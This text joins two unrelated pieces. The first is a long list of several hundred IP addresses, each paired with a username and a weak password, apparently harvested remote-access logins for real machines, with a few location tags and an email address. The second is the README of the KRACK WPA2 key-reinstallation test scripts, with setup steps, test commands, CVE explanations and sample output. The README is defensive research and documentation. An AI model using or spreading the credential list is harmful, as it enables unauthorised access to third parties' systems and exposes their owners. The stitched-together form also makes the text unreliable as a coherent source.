96.234.156.35;xerox;xerox United States-MD-Annapolis 216.255.244.100;test3;Pa$$w0rd United States-FL-Ocala 65.182.241.24;info;Password1 86.51.170.163@admin;admin 93.125.93.13@test;test 190.54.40.103@user;user 95.65.61.112@test;test 88.249.217.12@test;123456 71.248.114.19@user;user 85.72.60.11@user;1234 113.161.161.138@1;1 27.251.23.122@user;admin 65.41.114.140@user1;123 188.27.131.7@user;user 80.78.73.143@user;user 50.74.234.194@user1;user1 208.180.6.202@user;user 173.196.228.162@user;user 82.200.195.178@user;123 109.86.66.108@user;user 91.144.167.168@user;123 217.169.211.13@user;123 202.191.247.99@user2;123 97.67.2.234@user;user 210.4.56.81@user1;user1 soheil_faraz2@yahoo.com 186.251.180.206@admin;admin 186.244.79.212@admin;2012 186.231.66.218@administrator;p@ssw0rd 186.244.100.103@administrador;q1w2e3r4t5 186.226.68.140@administrador;1qaz2wsx 186.225.63.250@administrador;123456 186.244.224.18@administrador;123123 186.236.135.82@administrador;oracle 186.247.147.132@administrador;administrator 76.67.201.78@user;us 76.79.104.246@admin; 76.79.229.179@admin; 87.218.159.10@usuario;adm 88.3.91.19@administrador;12345678 194.30.41.236@Administrator;! 189.31.226.201@remoto;123456 177.10.193.100@user;sakhi 177.19.218.99@teste;1234 189.27.195.242@teste;123456 213.228.144.251@test;test 213.97.178.115@usuario1;usuario1 213.96.82.89@Alicia;Alicia 213.172.32.96@prueba;prueba 59.90.83.156@administrator;Password123 58.68.70.104@bharat;123456 59.90.207.164@administrator;password123 59.90.193.207@user4;123 59.90.193.254@user1;123 59.90.216.209@admin; 195.82.150.134@Test;test 81.35.210.231@usuario;0000 110.93.211.10@admin;0000 119.152.247.149@administrator;Abcd1234 180.92.159.138@administrator;11 186.109.90.227@remoto;remoto 189.139.147.138@Administrador;123 189.144.4.95@Administrador;admin 189.131.129.183@prueba;123 189.136.137.167@usuario1;1111 189.132.178.198@prueba;prueba 189.129.206.187@prueba;123456 148.244.226.124@prueba;prueba 189.134.60.45@Administrador;Abcd1234 189.132.123.117@Administrador;12345678 189.148.47.182@user1;user1 189.152.19.106@user;user 189.156.109.45@administrator;123456 189.128.215.135@prueba;prueba 189.152.123.73@Administrador;1234 189.146.213.15@remoto;123456 189.158.17.80@administrator;administrador 189.155.189.245@user1;user1 189.149.88.12@prueba;prueba 189.152.196.88@usuario1;1 189.155.226.157@user1;user1 189.152.148.82@prueba;prueba 189.155.196.24@user1;user1 189.158.202.2@user;user 46.24.140.114@usuario;usuario 217.12.247.142@admin;123456789 217.23.74.126@admin;1 217.23.146.245@admin;admin 217.25.227.194@user1;123321 217.170.125.222@test;123456 217.195.80.50@administrator;1234567 217.150.75.141@manager;123 202.108.135.131@user1;1 78.24.41.253@user1;123 203.191.168.52@test;Password1 78.29.14.144@user;12345 195.57.0.110@user;12345 195.93.170.24@test;P@ssw0rd 195.57.190.66@user6;user6 177.9.72.181@usuario,usuario 177.3.250.192@administrador;1 189.31.226.67@remoto;123456 46.183.183.54@user;23456 177.139.187.13@usuario;123 177.139.198.41@teste;123 93.20.170.28@user; 95.141.113.65@test;test 95.141.119.45@test;test 219.238.188.184@test;test 221.212.159.58@Administrator;Password1 124.128.37.62@Administrador;Password 59.125.186.6@user1;user1 59.125.209.38@user2;user2 60.248.58.82@user1;user1 77.229.166.30@usuario;0 84.94.115.80@administrator; 195.182.82.234@test;test 80.179.192.228@scan;scan 76.72.88.22@1;1 123.7.10.101@test;Password 123.108.250.138@administrator;1 201.122.92.2@administrator;Passw0rd 189.178.4.238@remoto;123456 201.144.165.68@Administrador;Password1 200.57.151.33@prueba;prueba 201.155.205.220@prueba;1 148.243.37.219@prueba;prueba 189.173.11.131@Administrador;1 189.155.249.195@remoto;09139415262 186.109.209.76@remoto;12345 186.130.208.76@remoto;123456 78.107.75.252@admin1;123456789 78.109.118.162@user1;123456 78.110.244.151@user;12345 78.140.62.180@user1;123 79.172.33.35@user;1 79.175.33.218@user1;1 80.73.203.177@user2;12345 80.76.235.5@user3;12345 80.82.50.175@user2;1 177.0.83.80@usuario;usuario 189.35.85.23@administrador;123 189.36.145.3@teste;teste 189.35.20.179@usuario;123 189.38.203.163@usuario;usuario 27.253.118.169@Administrator; 58.108.241.231@Administrator;@admin 177.33.112.230@Administrador; 177.97.36.121@administrador;senha 177.99.59.121@teste;123 79.120.113.77@admin; 79.127.112.143@admin;admin 79.108.0.62@administrador;12345678 79.103.3.185@administrator;12345 79.129.2.64@user4; 79.122.136.126@user1; 79.129.15.43@user1; 79.104.37.6@scan;000000 79.123.52.65@guest;password 79.123.23.208@reception; 117.6.134.27@admin; 117.6.64.15@administrator; 117.3.65.34@guest; 117.6.9.170@guest; 74.86.35.94@Test;test 74.86.35.92@Test;test 74.86.35.88@Test;test 74.86.35.89@Test;test 74.86.35.91@Test;test 74.86.35.95@Test;test 74.86.35.93@Test;test 74.86.35.90@Test;test 74.86.65.154@teste;123456 74.87.12.139@admin;admin 74.86.100.93@Test;test 74.87.124.69@user1; 74.86.207.80@scan;999999 79.140.1.64@admin; 79.144.165.50@administrador;admin 79.144.158.191@administrador;servidor 79.144.140.29@administrador; 79.144.218.18@administrador;admin 79.145.86.248@administrador; 79.141.207.52@Test;test 79.145.30.232@usuario; 79.148.46.159@usuario;1 79.148.98.244@admin1; 79.148.101.111@usuario; 79.147.203.4@usuario1; 79.148.79.96@almacen; 79.148.113.125@administrador;12345678 79.148.116.110@administrador;12345678 79.148.114.109@remoto1;remoto1 79.148.110.238@prueba;123456 79.148.104.179@scanner;scanner 79.148.126.138@administrador; 79.148.224.237@usuario; 79.148.123.97@usuario1;123456 79.148.118.235@pc;123456789 79.150.38.169@administrador;654321 79.148.230.157@server;123456 79.148.230.212@scanner;scanner 79.152.173.240@usuario; 79.148.241.156@usuario1;1234 79.169.106.6@remoto1;123456 79.165.213.201@admin; 79.156.64.185@administrador; 79.158.246.56@administrador;a 79.168.247.19@scanner;123456 79.170.231.143@admin;12345678 79.159.171.166@taller;taller 79.168.255.33@backup;backup 79.172.60.166@user1; 79.158.194.43@administrador;admin 79.157.203.213@usuario;1234 74.165.203.188@administrator;server 74.143.146.35@ASPNET; 74.130.232.165@admin; 74.122.192.98@administrator;changeme 212.145.172.94@usuario1;abcd1234 212.170.198.157@remoto;remoto 213.37.161.233@administrador; 187.35.76.29@administrador;123456 212.230.46.128@remoto;12345 187.35.68.51@usuario;123456 177.19.228.61@user1;teste 177.34.148.8@usuario;usuario 177.33.192.249@administrador;1234 177.68.77.144@teste;123 213.98.84.206@remoto;remoto 78.187.21.96@user1; 78.187.94.251@user1; 78.187.133.217@user; 220.248.7.114@guest; 78.187.156.209@user;123 78.187.211.96@guest; 83.36.56.115@server; 83.36.59.171@prueba;1234 83.36.62.95@ALMACEN;1234 1.34.86.191@user; 24.133.177.226@administrator;1 78.186.126.227@administrator;1 78.187.37.76@administrator;1 78.187.40.46@admin;123456 212.9.71.149@prueba;10 81.37.100.15@usuario1;1 82.151.215.154@user1; 83.69.176.171@manager; 83.219.130.30@user2; 83.246.143.72@user2;12345 84.22.133.148@user4;1 84.42.45.85@user2;123 84.204.176.170@user1; 46.48.170.134@user;123 81.222.82.62@manager;manager 78.189.14.182@user;1234 78.189.240.91@administrator;09139415262 81.213.152.119@administrator;123 78.189.102.135@user1;1234567 83.66.193.27@administrator;123 85.100.42.142@administrator;1 85.100.199.67@administrator;123456 85.103.43.159@administrator;1 85.102.235.233@administrator;123456 31.210.77.75@administrator;123321 46.1.103.207@administrator;1234 78.177.47.99@admin;12344321 78.183.14.136@administrator;1234 78.186.119.100@administrator;123456 78.165.181.18@administrator;12345678 85.133.225.146@Administrator;123456 217.219.196.20@Administrator;123 85.15.43.169@Administrator;123456 217.219.103.30@Administrator;1 80.191.156.209@Administrator;123456 84.241.36.52@Administrator;vahid 89.165.120.52@Administrator;123456 178.251.213.91@Administrator;123456 88.12.62.54@jose;jose 88.2.188.24@user4;user4 88.2.195.199@Usuario;123456 88.2.176.251@almacen;almacen 88.12.12.73@remoto;remoto 88.12.32.80@servidor;1 88.4.32.135@taller;taller 88.2.172.196@remoto;remoto 88.2.223.109@Usuario;1 88.12.14.167@Usuario;1234 2.139.231.164@admin; 31.59.145.121@test;1 187.5.17.85@user; 187.7.95.78@server;123 187.7.1.246@scanner;scanner 187.11.175.128@user;0 187.11.190.74@scanner;scanner 187.16.34.132@user; 187.143.212.119@bodega;bodega 187.143.212.119@agente;agente 200.161.119.33@teste;12qwaszx 201.6.123.53@usuario;usuario 200.217.178.202@usuario;123456 187.7.95.78@server;123 193.253.198.160@scan;scan 212.156.66.86@test;test 206.169.187.242@scan;scan 91.122.216.189@manager1;1234 91.122.195.34@sklad;12345 59.99.229.24@administrator;P@ssw0rd 59.90.236.178@manager;123 119.145.96.153@admin;123456 119.145.96.46@support; 186.202.184.123@administrator;1q2w3e 186.215.73.113@user; 186.215.141.186@user;1234567 186.215.100.186@scanner;scanner 186.218.153.175@administrator; 186.222.206.39@user;0 186.238.51.142@administrator;bangye 187.1.173.94@admin;000000 186.247.244.83@user2;123 123.51.18.193@scanner;scanner 72.240.120.141@user2;123 78.187.157.114@server;1 78.141.18.94@scanner;Passw0rd 193.219.135.177@scan;scan 183.63.217.68@test;test 195.97.106.14@manager; 217.128.35.82@test; 187.75.232.196@Administrator;Administrator 187.104.106.194@administrador;123456 187.85.23.170@administrador;1 187.127.236.2@Administrator;12345678 187.75.251.111@administrador; 187.37.107.114@administrador; 187.18.101.198@administrador;123 187.52.11.102@administrador;admin 187.54.178.98@administrador;Administrador 187.35.81.80@Administrator;superuser 187.45.35.202@administrador;123 187.111.221.6@administrador;123456 94.185.142.82@reception;qwerty123 94.143.244.66@oleg;1 81.149.168.178@admin;112233 83.38.220.255@administrador;servidor 187.54.72.10@administrador;servidor 182.73.196.35@test;test 190.11.202.185@adm;adm 189.17.184.58@Administrador;112233 80.34.18.56@administrador; 80.175.21.162@admin; 181.164.115.96@administrador;INTERNET 182.73.59.126@Administrator;passw0rd 80.28.210.35@administrador;qwerty 181.54.247.20@Administrator;Administrator 80.153.134.237@Administrator;Administrator 80.30.217.182@administrador; 200.204.87.42@Administrator;P@ssw0rd 219.91.143.209@Administrator;administrator 59.167.226.33@user;password 83.54.141.144@almacen;almacen 83.57.77.162@almacen;almacen 208.72.70.54@reception;password 77.228.171.115@anna;1234 79.148.122.207@almacen;almacen 210.3.0.193@computer;computer 210.17.176.114@user4;user4 81.39.147.167@administrador;servidor 62.82.215.202@almacen;almacen 83.59.159.93@jose;jose 58.211.138.58@test;test 87.126.246.239@Administrator;123456789 62.82.215.199@almacen;almacen 180.148.2.47@Administrator;adminserver 58.23.127.68@Administrator;demo 58.47.128.146@Administrator;123 87.216.218.25@administrador;1234 58.68.78.60@temp;temp 59.36.98.61@support;backup 83.61.9.179@servidor;0 202.177.254.244@user1;user1 84.217.226.197@user;123456 81.19.38.84@administrador;ronaldo 46.24.237.145@almacen;0000 62.82.215.195@almacen;almacen 46.27.202.200@administrador;admin 175.136.245.34@user4;user4 202.155.254.149@test;123456 151.1.217.220@Administrator;administrator 38.104.30.158@tester;letmein 87.241.166.132@user1;user1 87.249.234.38@manager1;123 115.135.106.100@test;test 58.215.81.40@support;user 203.35.165.49@temp;11111 58.177.237.58@temp;temp 165.228.183.195@user;password 85.70.187.152@operator;0000 203.88.129.50@computer;computer 88.2.238.110@administrador;qwerty 80.32.19.93@administrador;123456 210.245.3.139@admin;admin 76.79.229.179@admin;administrator 76.196.53.246@user1;12345 180.73.198.50@Administrator;admin123 108.180.231.29@office;office 93.153.10.173@Administrator;vahid 96.57.134.59@Administrator;administrator 88.32.35.218@Administrator;Administrator 219.89.83.145@Administrator;passw0rd 46.65.220.89@test;test 88.102.142.212@sklad;123 62.38.219.148@Administrator;admin 190.108.199.183@Administrator;opera 2.139.237.84@almacen;1q2w3e4r 62.38.142.15@Administrator;INFO 124.30.145.90@1;12345 180.166.18.83@Administrator;123456 217.91.236.223@Administrator;1234567 60.12.10.68@admin; 62.38.125.233@user1;1 62.149.95.242@adm;123 2.139.182.48@vlad;abc 208.111.10.194@adm;root 217.91.13.45@admins;1 80.37.71.125@administrador;1111 181.164.32.27@administrador; 200.220.139.138@teste;123 200.161.122.109@administrador;servidor 177.106.130.74@usuario;1234 177.34.156.138@teste;1234 189.36.151.14@teste;123456 189.48.207.174@administrador;123456 189.31.191.67@teste;123 189.39.157.2@administrador;master 189.41.106.39@user;123 189.124.116.131@admin;123 189.26.147.169@administrador;adm 189.47.161.151@teste;12345678 217.219.182.108@remote;remote 118.175.64.125@admin;p@ssw0rd 196.202.31.211@admin;123 81.214.86.137@user2;123456 213.174.1.68@test;1234567890 62.38.219.148@administrator;administrator 201.41.62.145@administrator;administrator 74.253.103.120@Administrator;admin 177.19.228.156@admin;admin 81.43.125.96@user;pass 178.63.73.212@user;user 202.124.98.231@test;test 69.224.81.182@test;password 182.72.68.156@user1;user1 220.130.236.139@user1;12345 217.128.33.157@test;test 178.248.71.138@user1;12345 93.72.133.51@user;123 83.206.111.113@scan;scan 212.119.200.172@manager;manager 99.108.77.6@user;user 63.253.168.125@test;password 84.54.143.24@test;test 200.168.9.192@user;123 78.93.236.78@user1;user1 173.49.119.228@user1;1234 62.97.60.217@user1; 89.175.174.154@test;123 213.55.12.57@test;test 81.13.103.3@User1;123 81.19.131.82@User1;1234567 81.23.194.154@1;1 81.23.150.73@User2;123456 81.25.164.31@irina;123456 81.30.196.142@1;1 81.26.88.164@director;123 81.91.55.142@User1;user1... 213.187.252.59@user1;123 217.114.181.178@test;1 46.146.241.30@test;111 95.170.183.40@user1;111 95.188.102.88@manager;123 85.113.206.202@user;123 195.208.154.157@user1;1 188.17.159.195@user1;123 95.128.241.135@test;test 95.154.94.74@admin;1 79.135.66.104@sklad;123 217.145.145.126@user;qwerty123 87.229.164.106@user;123 78.25.61.233@user1;123 85.105.163.128@test;test 75.28.158.238@admin;admin 70.240.142.18@administrator;administrator 213.241.198.242@admin;asdasd 217.7.123.42@administrator;start 217.7.219.45@admin;tester 217.24.14.92@admin;install 217.79.2.198@admin;1 217.91.17.203@administrator;start 217.91.43.168@administrator;win2003 217.91.121.236@admin;install 217.91.149.56@admin;test 83.239.191.195 Admin;1967 77.120.38.47@admin;1 77.109.44.249@administrator;1 77.121.124.66@admin;123 77.121.163.45@admin;1 77.122.13.212@admin;1 77.122.15.199@admin;1 77.52.108.47@admin;123 89.253.41.118@admin;1 87.126.232.67@test;123456 193.200.69.42@administrator;main 193.200.38.114@user;1234567 193.200.32.249@1;1 194.12.228.80@administrator;1 194.12.228.229@administrator;qazwsx 193.200.187.51@user;user 194.146.235.66@user;user 195.230.16.82@sys;1234565 213.16.34.238@sys;1 213.91.193.129@Admin;123456 212.116.159.156@test;test 213.91.192.68@user;1234 213.91.194.153@user;zxcvbn 213.91.247.79@Admin;123 213.91.241.224@user;1234 213.222.34.138@administrator;123456 213.145.115.35@user;123 213.169.51.152@user;1 213.91.220.226@user;123qwe 213.169.52.78@user;1234 87.97.237.62@user;123qwe 87.126.44.101@user;123 87.126.55.32@user;123 87.126.246.15@user;123 87.126.251.146@user;1 195.96.228.242@administrator;P@ssw0rd 212.25.38.65@administrator;1 62.56.170.243@administrator;admin 62.219.153.37@administrator;administrator 62.90.58.131@user;user 62.219.153.37@administrator;super 62.219.196.215@administrator;4444 82.166.44.117@administrator;123456 84.108.254.238@administrator;secret 88.153.233.25@user;user 84.229.235.131@administrator;123 80.178.5.231@user;1234 24.232.68.11@Admin;admin 24.232.232.11@Admin;admin 168.226.214.32@Admin;academia 168.226.146.7@user;123 62.165.46.149:administrator;123456 62.168.148.194:administrator;Admin 62.168.172.82:administrator;12345 86.65.57.246:admin;admin 86.68.118.87:administrator;password 80.97.10.150:administrator;12345 85.91.141.196@user;P@ssw0rd 85.91.150.94@user;123456 85.130.36.51@user;1 85.130.58.185@sys;1234565 87.126.64.159@administrator;12345678 87.126.44.2@user;1234 87.126.142.221@administrator;1 87.126.111.94@Admin;adm1n 87.126.204.154@administrator;qwerty 87.126.210.31@user;1 88.80.137.62@administrator;1111 87.126.248.146@user;1 216.252.25.108@user;1234 216.254.85.227@support;password123 62.244.212.243@administrator;123456 81.213.167.199@administrator;1 81.213.174.168@administrator;1 81.213.125.19@administrator;1 81.213.77.241@administrator;123456 81.213.198.170@administrator;123 81.213.155.94@administrator;P@ssw0rd 62.48.201.61@administrator;manager 62.48.203.138@Admin;nimda 82.151.121.100@test;1 216.240.7.45@user;password 62.105.152.50@test;12345 187.85.203.250@user;1234 190.17.142.100@admin;123 2.112.83.234@test;test 168.187.71.184@admin;P@ssw0rd 88.250.123.224@manager;1 187.198.185.95@Administrador;123 178.72.85.68@manager;123 213.108.174.74@user;user 122.160.14.71@user;user 77.235.202.86@test;test 190.137.243.157@Administrador;1234 123.30.23.116@admin;admin 95.38.206.237@admin;admin 115.85.70.180@Administrator;P@ssw0rd 199.203.9.211@user;1234 203.191.168.226@test;test 59.152.245.138@user;12345 59.125.58.18@test;test 99.62.12.233@user;1234 203.149.185.120@test;P@ssw0rd 86.98.61.10@user1;123 70.63.7.203@user1;Passw0rd 125.72.160.230@Administrator;12345 210.7.16.205@remote;remote 111.93.187.138@Administrator;P@ssw0rd 94.158.54.34@Administrator;admin 109.188.65.42@manager;1 70.40.63.35@test;test 159.224.85.40@test;test 210.24.117.231@admin;manager 77.88.132.219@Administrator;admin 200.106.86.97@Administrador;123 212.64.161.111@user1;user1 190.0.53.54@Administrador;admin 190.73.237.219@Administrator;admin 37.25.54.103@admin;password 115.66.205.125@user1;user1 93.63.251.7@sys;123 187.66.48.152@Administrador;manager 177.139.142.22@Administrador;1234 213.27.239.211@Administrador;1234 109.74.50.32@admin;123 201.55.165.22@user1;1234 190.57.144.22@Administrador;admin 201.120.67.226@administrator;1 201.100.32.189@prueba;1 201.114.61.25@Administrador;123 201.103.173.134@remoto;12345 201.101.9.113@prueba;prueba 222.74.223.221@test1;12345678 222.75.151.182@user1;123 222.171.93.201@user1;1 218.17.220.81@test1;P@$$w0rd 221.2.89.182@administrator;1 125.32.113.118@server;P@ssword 83.32.125.66@admin;admin 83.32.82.219@usuario1;1234 83.33.146.210@remoto;123456 201.155.87.62@prueba;12345 201.155.230.5@Administrador;1234567 201.155.189.10@prueba;12 201.156.1.147@prueba;prueba 201.170.43.164@administrator;123 201.165.124.50@prueba;1234 201.172.244.42@prueba;prueba 148.235.79.244@prueba;123456 177.0.51.234@administrador; 177.0.65.130@servidor;123456 177.0.82.112@remoto;remoto 124.128.37.62@Administrador;Password 76.79.229.179@user;user 76.79.104.246@user;user 194.30.41.236@user;user 38.82.206.34@user;user 74.101.57.23@test;test 75.125.15.234@user1;user1 208.71.48.170@student;123 72.18.234.132@user;user 12.53.113.139@user;user 173.220.23.162@user;user 72.25.125.102@user;user 31.194.99.109@user;user 64.245.115.242@user;user 62.38.220.113@user;user 172.0.179.201@user;user 85.105.49.89@user;1 98.189.136.11@user;user 173.13.152.126@user;user 218.192.55.6@user;user 12.193.88.5@user;user 213.219.157.147@user;user 69.198.194.90@user;user 82.78.195.254@test;test 46.47.199.90@test;test 193.251.65.216@test;test 190.67.162.226@user;1234 212.120.209.156@user;123 109.74.128.190@test;test 88.26.209.5@test;test 207.164.177.210@test;test 49.248.101.143@test;test 62.215.133.26@test;test 221.181.211.35@user;123 212.74.218.206@test;test 175.139.144.4@test;test 89.145.200.66@admin;admin 86.57.244.81@test;test 119.203.160.244@test;test 109.80.18.172@admin;admin 183.182.89.201@test;test 58.137.115.29@test;test 202.83.214.18@test;test 65.211.29.3@admin;admin 87.139.98.163@admin;1234 91.192.61.5@test;123 193.251.5.195@test;test 212.81.209.34@admin;123 188.165.75.120@test;123 74.93.134.9@administrator;admin 79.120.76.58@test;test 75.146.215.133@test;test 83.211.138.117@administrator;admin 78.186.20.230@administrator;1 95.240.173.137@administrator;admin 189.62.202.132@admin;admin 58.137.173.12@test;test 67.106.147.106@administrator;admin 178.72.237.34@test;test 58.128.177.190@test;test 206.169.46.245@test;test 95.45.225.93@administrator;admin 208.80.239.233@user;user 169.244.21.34@user;1 184.71.68.54@administrator;admin 62.215.133.27@test;test 182.71.176.91@test;test 117.218.51.216@user;123 61.78.63.85@test;test 180.150.242.150@user1;1234 209.183.69.218@test;test 175.139.242.180@administrator;1234 72.55.164.46@user;user 202.147.189.131@administrator;123 122.201.246.187@administrator;admin 190.37.234.27@user1;123 85.105.246.126@user1;user1 114.32.44.207@administrator;1234 182.71.81.210@user;user 184.172.35.106@user;user 92.126.217.185@user1;1 80.37.210.114@admin;admin 95.170.181.82@user1;1234 91.196.76.70@administrator;admin 61.17.39.248@user;user 195.72.241.147@user;1 120.38.60.33@administrator;123 85.72.49.159@administrator;admin 37.53.66.157@user2;1 203.176.142.202@user;user 79.129.55.152@user;1234 80.228.76.130@administrator;admin 122.160.53.220@user;admin 220.132.110.208@administrator;admin 220.255.180.175@user1;user1 183.102.14.38@administrator;1234 178.23.215.6@administrador;admin 190.39.8.254@user1;1 121.28.40.240@user2;123 85.71.180.253@test;test 221.195.110.69@administrator;server 111.1.79.240@administrator;1 110.167.126.114@administrator;123 212.19.21.227@user1;123 59.126.254.141@user1;user1 118.186.253.205@administrator;admin 114.255.121.186@administrator;123 218.145.31.243@user1;user1 46.146.227.195@user1;123 201.74.173.112@admin;admin 87.117.40.117@user;1 61.148.69.18@administrator;1 80.28.51.105@administrador;admin 187.53.192.234@user2;user2 41.32.156.214@user;1234 116.208.7.23@user;test 222.185.235.174@user;1234 219.128.252.254@test;test 200.68.99.217@administrador;admin 202.78.74.37@administrator;p@ssw0rd 88.3.170.189@administrador;admin 66.160.138.83@user;user 60.54.192.108@test;test 41.134.33.178@administrator;p@ssw0rd 117.218.145.111@1;1 208.38.69.73@administrator;admin 181.31.194.117@administrador;1234 220.178.80.138@admin;admin 78.187.40.7@1;1 115.133.159.78@administrator;p@ssw0rd 80.32.210.82@server;server 220.166.95.178@administrator;1 93.107.101.65@test;test 60.169.17.167@administrator;admin 212.38.48.93@administrator;admin 212.98.191.228@test;test 41.131.106.66@user;user 220.163.107.114@administrator;123 203.45.212.72@test;test 117.218.57.58@user1;123
  21. This project contains scripts to test if clients or access points (APs) are affected by the KRACK attack against WPA2. For details behind this attack see our website and the research paper. Remember that our scripts are not attack scripts! You will need the appropriate network credentials in order to test if an access point or client is affected by the KRACK attack. 21 January 2021: the scripts have been made compatible with Python3 and has been updated to better support newer Linux distributions. If you want to revert to the old version, execute git fetch --tags && git checkout v1 after cloning the repository (and switch back to the latest version using git checkout research). Prerequisites Our scripts were tested on Kali Linux. To install the required dependencies on Kali, execute: sudo apt update sudo apt install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils virtualenv Then disable hardware encryption: cd krackattack sudo ./disable-hwcrypto.sh Note that if needed you can later re-enable hardware encryption using the script sudo ./reenable-hwcrypto.sh. It's recommended to reboot after disabling hardware encryption. We tested our scripts with an Intel Dual Band Wireless-AC 7260 and a TP-Link TL-WN722N v1 on Kali Linux. Now compile our modified hostapd instance: cd krackattack ./build.sh Finally, to assure you're using compatible python libraries, create a virtualenv with the dependencies listed in krackattack/requirements.txt: cd krackattack ./pysetup.sh Before every usage Every time before you use the scripts you must disable Wi-Fi in your network manager. Then execute: sudo rfkill unblock wifi cd krackattack sudo su source venv/bin/activate After doing this you can executing the scripts multiple times as long as you don't close the terminal. Testing Clients First modify hostapd/hostapd.conf and edit the line interface= to specify the Wi-Fi interface that will be used to execute the tests. Note that for all tests, once the script is running, you must let the device being tested connect to the SSID testnetwork using the password abcdefgh. You can change settings of the AP by modifying hostapd/hostapd.conf. In all tests the client must use DHCP to get an IP after connecting to the Wi-Fi network. This is because some tests only start after the client has requested an IP using DHCP! You should now run the following tests located in the krackattacks/ directory: ./krack-test-client.py --replay-broadcast. This tests whether the client acceps replayed broadcast frames. If the client accepts replayed broadcast frames, this must be patched first. If you do not patch the client, our script will not be able to determine if the group key is being reinstalled (because then the script will always say the group key is being reinstalled). ./krack-test-client.py --group --gtkinit. This tests whether the client installs the group key in the group key handshake with the given receive sequence counter (RSC). See section 6.4 of our [follow-up research paper(https://papers.mathyvanhoef.com/ccs2018.pdf)] for the details behind this vulnerability. ./krack-test-client.py --group. This tests whether the client reinstalls the group key in the group key handshake. In other words, it tests if the client is vulnerable to CVE-2017-13080. The script tests for reinstallations of the group key by sending broadcast ARP requests to the client using an already used (replayed) packet number (here packet number = nonce = IV). Note that if the client always accepts replayed broadcast frames (see --replay-broadcast), this test might incorrectly conclude the group key is being reinstalled. ./krack-test-client.py. This tests for key reinstallations in the 4-way handshake by repeatedly sending encrypted message 3's to the client. In other words, this tests for CVE-2017-13077 (the vulnerability with the highest impact) and for CVE-2017-13078 . The script monitors traffic sent by the client to see if the pairwise key is being reinstalled. Note that this effectively performs two tests: whether the pairwise key is reinstalled, and whether the group key is reinstalled. Make sure the client requests an IP using DHCP for the group key reinstallation test to start. To assure the client is sending enough unicast frames, you can optionally ping the AP: ping 192.168.100.254. ./krack-test-client.py --tptk. Identical to test 4, except that a forged message 1 is injected before sending the encrypted message 3. This variant of the test is important because some clients (e.g. wpa_supplicant v2.6) are only vulnerable to pairwise key reinstallations in the 4-way handshake when a forged message 1 is injected before sending a retransmitted message 3. ./krack-test-client.py --tptk-rand. Same as the above test, except that the forged message 1 contains a random ANonce. ./krack-test-client.py --gtkinit. This tests whether the client installs the group key in the 4-way handshake with the given receive sequence counter (RSC). The script will continously execute new 4-way handshakes to test this. Unfortunately, this test can be rather unreliable, because any missed handshake messages cause synchronization issues, making the test unreliable. You should only execute this test in environments with little background noise, and execute it several times. Some additional remarks: The most important test is ./krack-test-client, which tests for ordinary key reinstallations in the 4-way handshake. Perform these tests in a room with little interference. A high amount of packet loss will make this script less reliable! Optionally you can manually inspect network traffic to confirm the output of the script (some Wi-Fi NICs may interfere with our scripts): Use an extra Wi-Fi NIC in monitor mode to conform that our script (the AP) sends out frames using the proper packet numbers (IVs). In particular, check whether replayed broadcast frames indeed are sent using an already used packet number (IV). Use an extra Wi-Fi NIC in monitor mode to check pairwise key reinstalls by monitoring the IVs of frames sent by the client. Capture traffic on the client to see if the replayed broadcast ARP requests are accepted or not. If the client can use multiple Wi-Fi radios/NICs, perform the test using several Wi-Fi NICs. You can add the --debug parameter for more debugging output. All unrecognized parameters are passed on to hostapd, so you can include something like -dd -K to make hostapd output all debug info. Correspondence to Wi-Fi Alliance tests The Wi-Fi Alliance created a custom vulnerability detection tool based on our scripts. At the time of writing, this tool is only accessible to Wi-Fi Alliance members. Their tools supports several different tests, and these tests correspond to the functionality in our script as follows: 4.1.1 (Plaintext retransmission of EAPOL Message 3). We currently do not support this test. This test is not necessary anyway. Make sure the device being tested passes test 4.1.3, and then it will also pass this test. 4.1.2 (Immediate retransmission of EAPOL M3 in plaintext). We currently do not suppor this test. Again, make sure the device being tested passes test 4.1.3, and then it will also pass this test. 4.1.3 (Immediate retransmission of encrypted EAPOL M3 during pairwise rekey handshake). This corresponds to ./krack-test-client.py, except that encrypted EAPOL M3 are sent periodically instead of immediately. 4.1.5 (PTK reinstallation in 4-way handshake when STA uses Temporal PTK construction, same ANonce). Execute this test using ./krack-test-client.py --tptk. 4.1.6 (PTK reinstallation in 4-way handshake when STA uses Temporal PTK construction, random ANonce). Execute this test using ./krack-test-client.py --tptk-rand. 4.2.1 (Group key handshake vulnerability test on STA). Execue this test using ./krack-test-client.py --group. 4.3.1 (Reinstallation of GTK and IGTK on STA supporting WNM sleep mode). We currently do not support this test (and neither does the Wi-Fi Alliance actually!). Testing Access Points: Detecting a vulnerable FT Handshake (802.11r) Create a wpa_supplicant configuration file that can be used to connect to the network. A basic example is: ctrl_interface=/var/run/wpa_supplicant network={ ssid="testnet" key_mgmt=FT-PSK psk="password" } Note the use of "FT-PSK". Save it as network.conf or similar. For more info see wpa_supplicant.conf. Try to connect to the network using your platform's wpa_supplicant. This will likely require a command such as: sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf If this fails, either the AP does not support FT, or you provided the wrong network configuration options in step 1. Note that if the AP does not support FT, it is not affected by this vulnerability. Use this script as a wrapper over the previous wpa_supplicant command: sudo ./krack-ft-test.py wpa_supplicant -D nl80211 -i wlan0 -c network.conf This will execute the wpa_supplicant command using the provided parameters, and will add a virtual monitor interface that will perform attack tests. Use wpa_cli to roam to a different AP of the same network. For example: sudo wpa_cli -i wlan0 > status bssid=c4:e9:84:db:fb:7b ssid=testnet ... > scan_results bssid / frequency / signal level / flags / ssid c4:e9:84:db:fb:7b 2412 -21 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet c4:e9:84:1d:a5:bc 2412 -31 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet ... > roam c4:e9:84:1d:a5:bc ... In this example we were connected to AP c4:e9:84:db:fb:7b of testnet (see status command). The scan_results command shows this network also has a second AP with MAC c4:e9:84:1d:a5:bc. We then roam to this second AP. Generate traffic between the AP and client. For example: sudo arping -I wlan0 192.168.1.10 Now look at the output of ./krack-ft-test.py to see if the AP is vulnerable. First it should say "Detected FT reassociation frame". Then it will start replaying this frame to try the attack. The script shows which IVs (= packet numbers) the AP is using when sending data frames. Message IV reuse detected (IV=X, seq=Y). AP is vulnerable! means we confirmed it's vulnerable. Be sure to manually check network traces as well, to confirm this script is replaying the reassociation request properly, and to manually confirm whether there is IV (= packet number) reuse or not. Example output of vulnerable AP: [15:59:24] Replaying Reassociation Request [15:59:25] AP transmitted data using IV=1 (seq=0) [15:59:25] Replaying Reassociation Request [15:59:26] AP transmitted data using IV=1 (seq=0) [15:59:26] IV reuse detected (IV=1, seq=0). AP is vulnerable! 